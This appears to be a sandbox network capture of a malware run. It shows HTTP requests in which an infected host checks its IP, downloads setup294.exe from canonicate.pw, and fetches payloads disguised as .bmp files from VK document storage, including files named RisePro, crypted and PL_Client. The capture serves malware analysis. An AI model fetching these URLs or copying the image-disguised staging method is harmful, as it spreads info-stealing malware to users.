Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:05:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BYtjWdZXad4jNQoxbYCdkkUETKHc28UXhjgcIkTnbO4LCHCqAA047A1q%2BCPgM%2FExCd5dqnS61QCWkYs6FH1%2BOwsCI3NE8%2FjVlbgKsTXRj2Zkr7NEJi1SDQ2hVKrlTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d1692ebea8361-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:05:56 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 316736 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Mon, 07 Oct 2024 19:12:20 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; expires=Sat, 05 Oct 2024 10:05:56 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=4cc197c429e7515b9e; expires=Mon, 07 Oct 2024 16:27:18 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw; expires=Fri, 11 Oct 2024 19:43:12 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: canonicate.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:00 GMT Content-Type: application/x-msdos-program Content-Length: 1623546 Connection: keep-alive Last-Modified: Fri, 06 Oct 2023 08:15:58 GMT ETag: "18c5fa-60707d9a68b80" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 5600 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hQkDM8jnzPuPf092pJSkQ9mTQoXgPnq4PsfRuVSP%2BUUXJV9XV1ETHr3LHu%2FvBWGwEci3ZKKT0wsuOnJen11RWuVdbGTCd1TjKMpABmw86i8YYm%2BvHmllTjM00dpvswCb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d16d82b29afc3-NRT alt-svc: h3=":443"; ma=86400

GET /doc52355237_666326545?hash=syS3a4VzeA6ooPqV2bDmzdZcRY1zZZVZSwKomUizgpH&dl=9YVv5GINa4fsl9tfR95IZk8DoZOa4nbjbaLRAcxuMog&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:06:08 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c235031/u52355237/docs/d13/0aeb7c514923/PL_Client.bmp?extra=zEYLOhDaQqXBo8LHo45R7nwioXoRej0oNRyEVJGCrqajrvSvMw0tliZUIWtDiJ7aOfgdBozitFTgy__8OMIvxe4kKI1wRLO-Ex-HxkH2YWqrhTpszc1R-VBrI5-Kmqhg_zVTt6CoGc2U5-Af X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235031/u52355237/docs/d13/0aeb7c514923/PL_Client.bmp?extra=zEYLOhDaQqXBo8LHo45R7nwioXoRej0oNRyEVJGCrqajrvSvMw0tliZUIWtDiJ7aOfgdBozitFTgy__8OMIvxe4kKI1wRLO-Ex-HxkH2YWqrhTpszc1R-VBrI5-Kmqhg_zVTt6CoGc2U5-Af HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:09 GMT Content-Type: image/x-ms-bmp Content-Length: 3685892 Connection: keep-alive Last-Modified: Fri, 29 Sep 2023 10:24:43 GMT ETag: "6516a5eb-383e04" Expires: Sun, 05 Nov 2023 10:06:09 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666507428?hash=2uHHBsd637ELYzCc9kndmkrUdA72UYNEDayDJQpqLzT&dl=D6ajMB07kruzP2IXhjebY4apDN454ViEX7btbSffzho&api=1&no_preview=1#test22 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:06:14 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c237231/u52355237/docs/d20/a8c8e356a397/test21.bmp?extra=Tjw0Zjy3je3HMZXeKdEeufMcQUFV6Kmbq55-H6joKLRFzQtDRuF2VhtBI3HjFl4CSoL9kMSlXGIpQpmPdA112UYjtUJm9oEc6SZw2CzG8VK9ffvrZ5Ne4lXUeTqzct0FEcciUIElKxuvn4fK X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237231/u52355237/docs/d20/a8c8e356a397/test21.bmp?extra=Tjw0Zjy3je3HMZXeKdEeufMcQUFV6Kmbq55-H6joKLRFzQtDRuF2VhtBI3HjFl4CSoL9kMSlXGIpQpmPdA112UYjtUJm9oEc6SZw2CzG8VK9ffvrZ5Ne4lXUeTqzct0FEcciUIElKxuvn4fK HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:15 GMT Content-Type: image/x-ms-bmp Content-Length: 822788 Connection: keep-alive Last-Modified: Tue, 03 Oct 2023 15:25:58 GMT ETag: "651c3286-c8e04" Expires: Sun, 05 Nov 2023 10:06:15 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666586594?hash=KW7IbIZ7tmBJH0wG2dYyLQaNt8WD8FYrf1vp2ZdUsZg&dl=pOjzjpwFnDOIJueQO9TQfsaai7iwjVToI4s7cZ7eqks&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:06:18 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c237031/u52355237/docs/d40/13239ef116f6/crypted.bmp?extra=jf3Id-iBwCJuvxr_KRXy5iVBKvlBt9haNJnwFGhMhOGggvJmKTwuqVbRSPa3SInEVwMOySNlTCqJhf3WldOoR-8sHm1LapRTJDK_pGi_CPACwLEQXtJNeXxIsyq6aPqaHF78MEMsh43llNUi X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_666599954?hash=Ke0Vjy4wKSLLxQozgUIZIwbp7FUtx2g2p6dpZCPIz4w&dl=bAWjUoWQU7Q3yZO1dsgL8W1vYS7neHPYrNA6TsTwqPk&api=1&no_preview=1#fr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:06:18 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c237031/u52355237/docs/d49/4c3217c05748/66.bmp?extra=Md8eQEgzLGuOlPoQc55hANOV4S0t3MVk5Mq7j2oL9oMgKsIqX8p_L-eYo8Z0ACwN52xGrArbvIMXatBttmTHoFb8gQidHkcg5mbrFvML_A_l6nshcASkR0cVT8nCToj3Cb-0JteqFOHTxI1H X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237031/u52355237/docs/d40/13239ef116f6/crypted.bmp?extra=jf3Id-iBwCJuvxr_KRXy5iVBKvlBt9haNJnwFGhMhOGggvJmKTwuqVbRSPa3SInEVwMOySNlTCqJhf3WldOoR-8sHm1LapRTJDK_pGi_CPACwLEQXtJNeXxIsyq6aPqaHF78MEMsh43llNUi HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:18 GMT Content-Type: image/x-ms-bmp Content-Length: 1928196 Connection: keep-alive Last-Modified: Thu, 05 Oct 2023 13:23:05 GMT ETag: "651eb8b9-1d6c04" Expires: Sun, 05 Nov 2023 10:06:18 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c237031/u52355237/docs/d49/4c3217c05748/66.bmp?extra=Md8eQEgzLGuOlPoQc55hANOV4S0t3MVk5Mq7j2oL9oMgKsIqX8p_L-eYo8Z0ACwN52xGrArbvIMXatBttmTHoFb8gQidHkcg5mbrFvML_A_l6nshcASkR0cVT8nCToj3Cb-0JteqFOHTxI1H HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:19 GMT Content-Type: image/x-ms-bmp Content-Length: 1827844 Connection: keep-alive Last-Modified: Thu, 05 Oct 2023 18:06:13 GMT ETag: "651efb15-1be404" Expires: Sun, 05 Nov 2023 10:06:19 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666326536?hash=rjXXx4NTWZOjPDm1rBOZV0MNZKJKSPIncZVbfM7fUgs&dl=Xla71nPCOIeJASWCr6aET2SrexVgHh8tOBiaI24D3yw&api=1&no_preview=1#rise HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:06:23 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909228/u52355237/docs/d44/80744560c58d/RisePro_0_7_8d3TUvJJlkW1iIngb5qf_vmp.bmp?extra=Kk6yLQHn--N5FompiT-IH0ifi01IFPYP7q2QQzo0bJalEmOgQtvgf1zOtvbiiYBNSbHP-VAvDjqF79IIcuZTgAjYUUAfAB-3LyKUeyXFYvfpnWmV4UpmP5Ic1AyRMimEqEetIhCY8DkVLOFJ X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_666294895?hash=MrFrxQ1QY2cQxZMJSWB2ifsnzfn6OL4Lra0UjlNVtcg&dl=KQd3ouCijKMpS3N5SuzYWBo56zMPCFtaA3gtOmd22rc&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:23 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 316668 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u52355237/docs/d44/80744560c58d/RisePro_0_7_8d3TUvJJlkW1iIngb5qf_vmp.bmp?extra=Kk6yLQHn--N5FompiT-IH0ifi01IFPYP7q2QQzo0bJalEmOgQtvgf1zOtvbiiYBNSbHP-VAvDjqF79IIcuZTgAjYUUAfAB-3LyKUeyXFYvfpnWmV4UpmP5Ic1AyRMimEqEetIhCY8DkVLOFJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:24 GMT Content-Type: image/x-ms-bmp Content-Length: 10443780 Connection: keep-alive Last-Modified: Fri, 29 Sep 2023 10:24:29 GMT ETag: "6516a5dd-9f5c04" Expires: Sun, 05 Nov 2023 10:06:24 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_665872078?hash=Kz3PaU1L3NGuBFJAoGXACEafD960Cp8NVVxAzQR8U3H&dl=TGSEkTjAuxGOcQ0N10qRiCJlxoGRDvtzjKPataFdHhc&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:27 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 316668 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_666614921?hash=mcgvNSqLTxZlPytCXZGqWTE2UxkIsNsWwhJHKMUGNwP&dl=81n92g6ZKnuIdZcRjbJMbEnGbmv0a8p1IKQCT30gQB8&api=1&no_preview=1#risetest HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:06:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c235031/u52355237/docs/d13/73bbf3ecac7f/RisePro.bmp?extra=gmXlCsZiYpjnowLP1swWjhY13jlPrTv5pHnTY-UPWWq67yIxI8gpzQyCDAgcSMxg3HmEWDVFcv4uizvvHUpLyvaeP6yJ4WcGChVcA4r9lEKFycqfPVgpvV17uloL6pKJuj6CmFdFwkq5t3jX X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 316752 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235031/u52355237/docs/d13/73bbf3ecac7f/RisePro.bmp?extra=gmXlCsZiYpjnowLP1swWjhY13jlPrTv5pHnTY-UPWWq67yIxI8gpzQyCDAgcSMxg3HmEWDVFcv4uizvvHUpLyvaeP6yJ4WcGChVcA4r9lEKFycqfPVgpvV17uloL6pKJuj6CmFdFwkq5t3jX HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:31 GMT Content-Type: image/x-ms-bmp Content-Length: 5620252 Connection: keep-alive Last-Modified: Fri, 06 Oct 2023 08:01:09 GMT ETag: "651fbec5-55c21c" Expires: Sun, 05 Nov 2023 10:06:31 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

